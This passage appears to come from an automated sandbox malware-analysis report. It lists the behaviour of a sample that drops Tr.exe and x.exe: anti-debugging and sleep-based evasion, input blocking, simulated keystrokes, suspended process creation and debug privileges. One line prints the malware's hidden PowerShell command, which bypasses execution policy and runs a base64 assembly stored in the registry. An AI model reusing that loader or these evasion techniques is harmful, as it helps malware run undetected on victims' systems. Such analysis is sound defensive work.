Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 922 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3099 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1249 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2193 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1163 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: foregroundWindowGot 1776 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 920
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1002
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\._cache_1.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\._cache_1.exe API coverage: 3.9 %
Source: C:\Users\user\AppData\Local\Temp\Tr.exe API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\Tr.exe API coverage: 4.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380 Thread sleep time: -1249000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380 Thread sleep time: -1163000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\netsh.exe TID: 3420 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00B2449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00B2C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C75D FindFirstFileW,FindClose, 1_2_00B2C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2BD48
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0040449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C75D FindFirstFileW,FindClose, 12_2_0040C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 12_2_0040C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040BD48
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_1.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00AF5BFC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEA2A4 SetUnhandledExceptionFilter, 1_2_00AEA2A4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00AEA2D5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CA2A4 SetUnhandledExceptionFilter, 12_2_003CA2A4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_003CA2D5

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
